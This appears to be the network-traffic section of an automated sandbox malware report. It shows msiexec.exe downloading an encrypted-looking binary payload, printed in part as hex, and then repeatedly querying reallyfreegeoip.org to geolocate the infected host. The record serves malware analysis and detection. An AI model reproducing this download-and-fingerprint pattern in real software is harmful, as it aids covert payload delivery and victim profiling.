                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 275008
                                                                Last-Modified: Wed, 23 Oct 2024 10:58:36 GMT
                                                                X-GUploader-UploadID: AHmUCY3tTjCjaZO5v7hyRneD2mpBavCQ5Q9AKB9YhL2RDtmBgjt7ZhwfrXz_nw-jVJrGB87EuSHSYaI6cQ
                                                                Date: Thu, 24 Oct 2024 06:43:20 GMT
                                                                Expires: Thu, 24 Oct 2024 06:43:20 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=EzIWyQ==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-10-24 06:43:20 UTC4917INData Raw: f8 32 93 ce 39 e1 2c a9 97 05 88 df ae 36 3f 46 20 7d 29 f0 ca f2 d3 42 f2 a8 ed f5 95 bc 7c af 16 d0 0c ab 31 9a 56 cb 42 ae cf 7c c3 0d 65 f8 21 80 a1 6c 2c c6 22 f5 37 22 94 05 ca 95 0a 63 9d 03 a5 4b 5a 9f 23 03 d6 7b a2 8c 0d 2c f1 39 14 4c e2 6e a6 91 01 73 74 a6 f9 eb 18 b8 13 5a 3d 07 e2 c1 35 82 e4 fd 76 38 35 30 dc e6 db 74 9e 8b 32 8d 5c 9a c5 69 db 1a 3c 3a 82 ad 9c 75 dc e6 df 98 ab 14 d5 5c 7e a4 4a 0c 10 de 49 0d 89 7d c2 78 6a 4f 36 61 a1 4a 1a 35 db ba eb f4 1a 32 cc e6 c3 fb 4a fd 20 9b f0 49 56 52 9e b2 4e 6f 79 e9 9d eb 3b 9b 31 bc b0 97 57 31 ab 61 0d a3 e3 f8 4d ca c1 b0 8c 52 bd 2c 5e cb 49 e2 c3 33 4d 04 af 8a d4 08 5c 7b d4 80 18 90 47 41 4e b2 64 57 6d 6d 84 e2 a5 9e 66 84 f8 98 94 25 1a 83 a7 99 73 32 7b dd 88 78 20 30 15 29 91
                                                                Data Ascii: 29,6?F })B|1VB|e!l,"7"cKZ#{,9LnstZ=5v850t2\i<:u\~JI}xjO6aJ52J IVRNoy;1W1aMR,^I3M\{GANdWmmf%s2{x 0)
                                                                2024-10-24 06:43:20 UTC4864INData Raw: b5 a4 24 e0 b8 03 0d db 1a aa b0 e6 0e ae c1 0f ab 2d d5 c0 43 42 4a d1 d8 35 c8 24 46 04 93 7f 33 ed 7b 64 6b 4e 5a 82 86 46 9f 88 5d e3 e8 2b 7f de 91 99 89 95 6f c6 c5 22 53 90 9e 55 e5 e7 41 04 9b 82 88 63 fe 44 60 87 a6 f7 10 2d 1a ab 63 8a bd f4 b2 55 dc 86 9d 59 c6 4a 31 c9 32 4b 30 fb dd 34 cd d1 03 e4 e2 b7 78 58 12 e7 b5 14 a5 62 d9 ff c3 41 d7 f3 90 dc a9 04 8e 89 5a 96 8a d1 a8 33 f8 aa 83 57 bf c2 3e a8 a5 8a 9a 58 34 98 39 a9 a7 39 ce f0 17 94 b0 af 78 60 24 d1 f1 46 0d b9 e4 33 c0 ec 66 83 5d 7d 87 3e 5e 3d eb 45 2b f9 09 6a 42 c8 bd 7d 64 12 47 70 62 57 ad e8 83 00 da 43 00 1a 7a c9 11 a6 13 6a 36 8b 10 f7 ff f4 af 5a be fe be 48 ba 4d 7f 6b af f8 3b 65 77 c5 af 44 21 ef 58 ce cb 93 8d 17 37 5f 4d ff a8 5e 54 e7 0d 9e 36 6c 2f 37 12 88 5f
                                                                Data Ascii: $-CBJ5$F3{dkNZF]+o"SUAcD`-cUYJ12K04xXbAZ3W>X499x`$F3f]}>^=E+jB}dGpbWCzj6ZHMk;ewD!X7_M^T6l/7_
                                                                2024-10-24 06:43:20 UTC1323INData Raw: 1f d9 0c 59 cb d5 cb dc 9e 8a ff 5c ce 38 f2 61 d8 a1 27 84 9b 17 b2 c2 e3 b4 22 15 b2 2b 98 91 0a 72 2d d7 56 a9 09 eb 96 d6 21 76 7d fd 6a 1b 4c b9 04 2e e7 7b 8a 66 2f 22 d5 3a cd f0 c9 39 58 8f 15 60 d7 e2 df b8 4a 23 56 d3 7b 6b c8 03 44 50 19 57 39 db 58 fa a9 04 7f 49 40 90 23 b1 9a a5 95 c6 b6 7a 0c 3c 14 74 dd f3 57 b3 fa e7 46 a7 2c a6 bd 9a 85 9c cb 57 63 a5 2f b3 5a d1 dc 52 c3 15 23 c1 8e 15 e6 f8 bd 0c 6b d6 60 de d7 7a cb 23 18 aa ce d5 97 d7 d2 65 26 dc a3 50 5a 2f 63 1e ae af de 5c ae b2 d9 bd 82 39 b4 49 00 01 cb 31 a5 52 43 c2 b9 3c 2c c8 86 cc 69 89 39 2c 53 a3 2d 03 6f 84 83 ca c5 06 1b 57 f4 2a 28 49 97 69 8f 8b 0d 68 c3 e9 14 db 14 b1 e8 2c 62 34 a3 4d b7 b1 71 45 61 c4 b6 96 40 0c 3d af e4 53 f1 7c 7b c7 96 06 10 39 e6 45 56 6e 1f
                                                                Data Ascii: Y\8a'"+r-V!v}jL.{f/":9X`J#V{kDPW9XI@#z<tWF,Wc/ZR#k`z#e&PZ/c\9I1RC<,i9,S-oW*(Iih,b4MqEa@=S|{9EVn
                                                                2024-10-24 06:43:20 UTC1378INData Raw: 9c c3 13 2c 65 b6 6f 25 8a e0 bf ed 85 4e 90 6a 74 7e c9 3a 75 56 99 46 4a 04 70 83 42 e6 ff 7a 7e 5c 21 06 ac 6d 0f 50 fb 13 29 f2 b4 c2 d0 da d1 ba b5 af 97 03 53 96 f0 b7 5b f3 ab e2 68 5f 6a fe 74 14 02 7d bc a5 68 3b 67 b0 7a 01 9b 9e 18 2f 00 30 5c 84 d6 17 8e c3 b3 d2 49 d0 c7 40 a5 c2 86 9c 08 ad fe f8 98 96 6e 2f 57 e3 30 57 e6 6c 55 51 87 b5 0d 54 5d 7f 2b 9e 24 25 69 2f 98 b1 90 44 fc 08 07 35 1b e8 bc 1e 3c 0c be de 3c c1 99 82 8b ca 39 d2 43 e2 fe f1 fe 79 67 9e a7 e5 30 61 1f 44 43 71 08 2a 46 fc 27 8c 6e 54 ee 56 f5 3a 89 9e 46 67 1b 66 ef 4d 30 5a 0c 26 a4 11 57 f2 53 69 06 53 23 98 3e aa e7 e5 56 79 7d dc b7 61 86 64 e7 6d 3e 8a 0f b0 ac 5b c5 51 97 9b 6c 66 b0 9c 64 a5 21 a3 86 2e f4 ac 44 a5 db b1 4d 6f 26 2a ad e3 2e 20 6e 9b 50 32 6e
                                                                Data Ascii: ,eo%Njt~:uVFJpBz~\!mP)S[h_jt}h;gz/0\I@n/W0WlUQT]+$%i/D5<<9Cyg0aDCq*F'nTV:FgfM0Z&WSiS#>Vy}adm>[Qlfd!.DMo&*. nP2n
                                                                2024-10-24 06:43:20 UTC1378INData Raw: 5d 02 1d 62 fd 04 d6 4e f4 85 52 a2 b4 9c a4 3f d4 76 d5 f8 b3 ec 10 29 19 0d 9d 05 98 e5 62 b5 f4 b4 4a e9 bd de ca ff 12 bf 3f 0d 27 41 98 b8 7b be 51 f2 7d 86 ac c6 6d 2e e0 6e ce 15 80 03 9e b0 e2 76 ea cc 0f f3 59 fd 41 49 9c 40 c7 0c 34 db 6c 1b 0d bf 71 22 e5 6c 51 a1 4e 5a bf 87 46 b4 12 5c f2 e0 33 10 14 91 99 83 95 6f d5 cd 5c 6d 3d 9f 51 cd 37 41 04 91 25 45 63 fe 40 60 96 ae 89 2a 2d 1a af 1d b1 bd f5 b6 26 60 51 9c 53 a9 5f 30 c9 38 5b 21 f3 cc 77 a2 1f 02 ff d8 b4 69 ef 7d 28 b5 07 af 62 e0 9b c3 69 b2 f3 4e c6 87 2b 92 d3 5a 9c 93 d8 c7 47 9a aa 89 32 05 c2 3e a2 a5 f3 b0 48 b9 c3 4b fe a4 56 db e6 3f 1f b0 a8 75 19 bc d0 e2 47 1b dd ba f8 c1 e6 09 95 76 7d 8d 36 76 a5 82 45 21 e0 16 10 74 d9 b9 71 01 9b 3d 70 12 4b 96 6c 83 11 d5 26 95 1b
                                                                Data Ascii: ]bNR?v)bJ?'A{Q}m.nvYAI@4lq"lQNZF\3o\m=Q7A%Ec@`*-&`QS_08[!wi}(biN+ZG2>HKV?uGv}6vE!tq=pKl&
                                                                2024-10-24 06:43:20 UTC1378INData Raw: 11 1f 8f 74 d7 01 7c de 76 dc 78 fd eb 84 58 a4 a0 f4 0b 7e 63 53 b9 f8 03 2b 93 56 f7 ea 2f 50 2b cb 92 79 22 c4 17 e6 e6 52 d8 bc 5f 1d f6 34 af 90 6e 88 7b fa 17 f9 a9 11 22 10 3b 03 20 ff 5a fb 06 2f 1f 1b 40 1f 73 ca dd a4 78 83 48 64 7e 1c 47 d7 7a e8 14 d9 52 66 ac b4 a3 47 5e 49 cc d2 56 9b cc c4 f7 72 52 53 37 90 d3 9b 1b d2 9d 72 0a 1c e9 b1 2a db 02 b1 cf 83 4f 94 a1 f8 eb 98 34 53 be 54 41 6a 1c a5 95 39 1e 3b fd bf 50 61 d5 25 8e 3e 4f aa 1f 9e ef 17 80 c7 a7 7e f9 f8 e5 06 03 64 f5 d3 5b 0b f3 c0 05 1f 60 bb 13 af c2 99 8c be 3c 89 8b bb bd 61 88 1c b6 e8 3d 09 6d 07 06 17 5f d4 8a b4 bc 45 40 78 ee b1 d3 89 38 3f 21 fa fa 72 3c 58 6b 8f 05 19 ec f3 bc be 96 d6 91 ea 70 33 69 b2 a5 9b 1a 13 c7 36 32 72 33 6a 40 6f 12 bb af ab 7c fb 17 03 f4
                                                                Data Ascii: t|vxX~cS+V/P+y"R_4n{"; Z/@sxHd~GzRfG^IVrRS7r*O4STAj9;Pa%>O~d[`<a=m_E@x8?!r<Xkp3i62r3j@o|
                                                                2024-10-24 06:43:20 UTC1378INData Raw: 07 31 e7 47 9e 41 d9 5f b4 0a d4 33 f1 ec 20 9c 9a 03 8b 12 96 83 e4 0b 56 63 95 91 b5 16 5a 43 3f 9b f1 22 0e 4f 58 13 cd 64 1d 19 30 e7 ce bc a0 69 0d ce 29 f1 c9 6b 08 14 e0 07 10 cf 3d b7 33 2b da 59 15 4b 55 9f 23 2b a5 7b a2 86 f2 cf 7c 79 ac 4c e3 4b b0 e3 94 78 34 d6 d1 aa 18 b8 15 f8 18 10 9c 84 35 82 e0 5f 53 20 47 84 cd e6 ab 5c de 8b 32 8b fe bf dc 17 9d 1a 3c 3e a0 88 86 07 32 e8 65 e6 09 85 c7 8a d2 5c 4b 40 dc da 0b 17 82 1e e2 78 ba 05 46 3b 74 27 3a 5c 18 f1 9d e9 34 07 ae f3 41 ac 26 bb b4 f2 9e 63 b0 38 d7 e0 1f 12 1d fc 11 ce 43 91 15 b6 12 bf 22 31 ab 6b 4e f8 91 5a 14 cb b2 ce 4a d7 2d 4e 76 82 49 e2 c9 41 dd 16 4f fa fe 4b 57 7a 82 91 06 9d 57 69 0a a6 64 51 6d b0 05 e3 6b a5 47 ac cc b8 94 2f 09 dc a3 b1 11 32 3b d7 56 58 20 30 15
                                                                Data Ascii: 1GA_3 VcZC?"OXd0i)k=3+YKU#+{|yLKx45_S G\2<>2e\K@xF;t':\4A&c8C"1kNZJ-NvIAOKWzWidQmkG/2;VX 0
                                                                2024-10-24 06:43:20 UTC1378INData Raw: c7 de d4 e6 f6 8f 71 80 df bf 18 92 51 27 33 0b 2e 30 3c d9 80 fe a7 c8 ab 09 9a e9 1b 68 20 82 29 98 24 e1 42 b4 7f 15 14 d2 b0 5b ea d2 23 0a 9e 38 07 7e 32 ca ad 99 3e d2 64 7c 4a 0e 82 c5 09 14 f4 7f 6d 6e cd 39 6c f3 36 a5 86 c6 4c 79 c1 98 83 a5 d7 04 7f 88 34 3d a9 6d 42 b1 94 2f 58 cd 24 c3 d6 18 80 0a 9c 50 99 2f bf 18 0e 68 1b ee 69 77 49 d0 55 d7 5a fc 8f 82 1e 29 7c ab 4d 10 68 65 ac c7 c1 a9 d3 bf 82 b7 a1 a7 2f bd 8e 9d ad f0 a7 ed f8 54 9d 58 b4 5f 5e c4 5d 4d 06 aa 83 fd 17 8f 67 d7 6a 7f c4 b4 5b 4f 26 f2 b5 5f dd b6 9a bc 97 9c 93 04 bf 92 4e 66 13 6f 10 c6 26 86 fa 6b ee 18 b8 6d 47 ec 61 3c 49 35 12 6f 55 a8 19 9a f5 fd 77 58 6a 04 d6 ec 32 0c 73 14 06 4e a6 54 bc 26 ee f4 6c 0e 8e a6 38 c5 6f bb 50 ff bb ae cb de 38 89 d5 a1 68 3f ff
                                                                Data Ascii: qQ'3.0<h )$B[#8~2>d|Jmn9l6Ly4=mB/X$P/hiwIUZ)|Mhe/TX_^]Mgj[O&_Nfo&kmGa<I5oUwXj2sNT&l8oP8h?
                                                                2024-10-24 06:43:20 UTC1378INData Raw: c6 7f 22 a4 9e 61 df bb bd 68 29 ec 9f d0 3f 58 53 93 10 6d 4e cc 5c 18 c5 f1 54 ae d6 84 43 68 e2 00 fb 21 53 2e 00 b9 25 a5 23 04 17 23 5e 80 18 cd 04 56 62 05 8c af ad 2a fe 88 8f 03 dc 44 fb 29 e3 1a 61 f3 8e 38 1a e1 0e ce 77 ca 1f 94 70 fa b7 fb 7d 2d 4c ec 06 fd 4a a0 8a c2 55 b4 a0 c6 55 ea 30 41 07 06 bc 80 4b 5d 40 d6 e5 9c a0 0e e9 a9 c0 4e 5b a1 9a 49 4a 42 3c 0e 7e 43 8c eb a7 87 e9 06 79 58 c3 0a ab 37 ca 62 83 d8 81 ba d8 96 cc 12 02 1c 9d 0f ba 11 b4 6a 32 e9 f2 7c 79 51 49 6a a8 46 ce 93 d1 8a 3a 09 01 95 33 18 e9 a6 eb 9f c7 82 fb 94 4e 07 ab ad d3 94 ba d7 1e ba 88 77 00 55 3c 47 89 3f 02 19 ca 06 1e a4 88 e4 fb 15 00 9c ed d6 68 dc 19 6d ee 9b 67 10 57 38 1b 63 00 f8 2d 73 90 d2 fb 50 75 fb b1 1b fe 37 a3 5c 0e 5e 92 e8 1a 54 a9 07 7a
                                                                Data Ascii: "ah)?XSmN\TCh!S.%##^Vb*D)a8wp}-LJUU0AK]@N[IJB<~CyX7bj2|yQIjF:3NwU<G?hmgW8c-sPu7\^Tz
                                                                2024-10-24 06:43:20 UTC1378INData Raw: 28 6a c6 f4 de bc 5c 23 2c 85 a5 6b c8 0d 6c 6a db 57 33 a3 af e2 b8 7c 72 a1 40 90 2d ad 8a a5 95 c6 d9 c0 30 3c 1e 70 bf 32 38 76 f0 f4 5d a7 20 a6 bd 9a 98 0d c9 57 19 b3 16 3a 28 b3 c6 44 4d 3c 84 d3 9f 0d b8 8c bc 1d 0c 91 f1 de d7 7a a4 e4 33 a1 c4 c4 97 c9 a0 22 66 dc a9 51 7f 28 00 5c 9f af ae fa a3 6e f1 09 88 56 72 eb 25 13 b9 76 bb 2c 09 60 9c 21 2c cb 86 cc 69 58 a0 36 21 d3 4d ce 1f 26 ac d1 aa 3d 0a 5b 9f 46 0d 55 ef e1 91 87 12 05 eb 9c 1e db c0 ce 05 04 56 3e a3 39 98 a2 71 69 70 0d b6 9c 94 1f 34 d1 d5 53 f1 06 3c 90 94 02 12 78 cc c4 26 78 3d 97 35 7a 73 bf 81 01 bd b6 56 e8 12 1e 88 0a 2f 9b f9 53 06 7c df 73 ca 0a e8 fd fa 34 06 85 e7 4c 24 63 53 b9 28 7c 32 e1 70 ee c2 de f2 0e d8 fa bf 21 ce 15 7d 61 4f aa 87 22 2e 86 96 8e f9 47 aa
                                                                Data Ascii: (j\#,kljW3|r@-0<p28v] W:(DM<z3"fQ(\nVr%v,`!,iX6!M&=[FUV>9qip4S<x&x=5zsV/S|s4L$cS(|2p!}aO".G


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449779188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:24 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:24 UTC887INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: MISS
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsmS%2BVCogTo%2Fc6ObqzNY7QsjRvN3715TYW0DySXwhAqqvZRNYtb%2BygHJpNvlyVZcLPRa9jfRQH8ic7MwxYZk78tnjRlsBwrVI%2F87QYE9BG5Hkzq3%2Bpsme69BC4gleApKeOlLxI74"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe0b7ab14635-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1727&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1689614&cwnd=248&unsent_bytes=0&cid=ffb3c31a188e60c4&ts=563&x=0"
                                                                2024-10-24 06:43:24 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449790188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:25 UTC63OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-10-24 06:43:25 UTC891INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:25 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 1
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKY872%2BV82glmQY4kBmTqVp2TCmdhS3JYTDa43dxSqaVpTy2dZflHpXOKFKkvYhIOxuoizU%2FpwHxj189W5AoDW7vISk46E%2Fbf8oTfxuP9V2sCtMAKglGt5KM5lnJsBG05%2FaUVlqg"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe139a5ae524-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1067&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2671586&cwnd=32&unsent_bytes=0&cid=2271730cbac60468&ts=147&x=0"
                                                                2024-10-24 06:43:25 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449797188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:26 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:27 UTC896INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:27 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 2
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x4ucbLdmbEeMrWhvni3Dnz155POozX2umCkorftDm6PfeFPIjeGvnkZrwptXMPbZ2LSqJUolJD8qfKXUmSZ1r7WG4sMYQ%2FNMov%2BWp36PPNiU%2BlA5Gyb8sLROuuG%2BMCE0x%2FKhc%2BwY"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe1da9d42e18-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1669164&cwnd=229&unsent_bytes=0&cid=6e3e222cedc821fc&ts=149&x=0"
                                                                2024-10-24 06:43:27 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.449809188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:28 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:28 UTC898INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:28 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 4
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2B6A0ngnZrjUgvp4quUsuKeS1Qk%2F%2FXHClz5bxCg1f77SnYA3wOItfBm3S35%2FBLRfUOmODgUnVWksExmxuKCzC8cajxUAJGPqoE80sO5xhN9du30p7%2B%2BW3lWUOu%2Fq3tqHnprQRe2e"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe27df782e67-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1271&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2232845&cwnd=232&unsent_bytes=0&cid=a7bb60ae2c20e60a&ts=146&x=0"
                                                                2024-10-24 06:43:28 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
